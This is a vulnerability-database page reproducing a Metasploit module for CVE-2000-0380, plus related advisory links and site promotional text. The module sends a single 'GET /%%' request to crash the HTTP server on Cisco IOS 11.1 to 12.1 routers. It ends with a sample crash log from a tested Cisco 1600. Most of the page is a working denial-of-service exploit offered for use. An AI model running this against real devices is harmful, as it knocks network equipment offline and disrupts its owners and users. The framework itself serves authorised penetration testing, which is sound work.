Lucene search
K

Cisco IOS HTTP GET /%% Request Denial of Service

🗓️ 24 Sep 2007 14:05:37Reported by aushack <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 23 Views

Cisco IOS HTTP GET Request Denial of Service trigge

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2000-0380
29 May 201815:50
circl
Tenable Nessus
Cisco IOS HTTP Server Vulnerability - Cisco Systems
1 Sep 201000:00
nessus
Tenable Nessus
Cisco IOS HTTP Service GET Request Remote DoS
29 Apr 200000:00
nessus
CVE
CVE-2000-0380
12 Jul 200004:00
cve
Cvelist
CVE-2000-0380
12 Jul 200004:00
cvelist
NVD
CVE-2000-0380
26 Apr 200004:00
nvd
Packet Storm
Cisco IOS HTTP GET /%% Request Denial of Service
31 Aug 202400:00
packetstorm
CERT
Cisco IOS software vulnerable to DoS via HTTP request containing "%%"
9 Nov 200000:00
cert
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco IOS HTTP GET /%% Request Denial of Service',
      'Description'    => %q{
        This module triggers a Denial of Service condition in the Cisco IOS
        HTTP server. By sending a GET request for "/%%", the device becomes
        unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module
        tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
      },
      'Author' 		=> [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '1154'],
          [ 'CVE', '2000-0380'],
          [ 'OSVDB', '1302' ],
        ],
      'DisclosureDate' => '2000-04-26'))

    register_options(
      [
        Opt::RPORT(80),
      ])

  end

  def run
    connect

    print_status("Sending HTTP DoS packet")

    sploit = "GET /%% HTTP/1.0"
    sock.put(sploit + "\r\n")

    disconnect
  end
end

=begin

Patrick Webster 20070915 Cisco 1600 Router IOS v11.2(18)P

IOS info:
  IOS (tm) 1600 Software (C1600-Y-L), Version 11.2(18)P,  RELEASE SOFTWARE (fc1)
  Copyright (c) 1986-1999 by cisco Systems, Inc.
  Compiled Mon 12-Apr-99 14:53 by ashah

Example crash:

  %Software-forced reload
  Preparing to dump core...
  Router>
  *Mar  1 00:03:06.349: %SYS-2-WATCHDOG: Process aborted on watchdog timeout, Process = HTTP Server
  -Traceback= 80EE1BC 80F0EC0 80EC004 81C0832 81C0B2E 81C0C76 81C0D68 81C0E4E
  Queued messages:
  *** EXCEPTION ***
  software forced crash
  program counter = 0x80eaca6
  status register = 0x2700
  vbr at time of exception = 0x4000000

=end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.5Low risk
Vulners AI Score0.5
CVSS 27.1
EPSS0.35005
23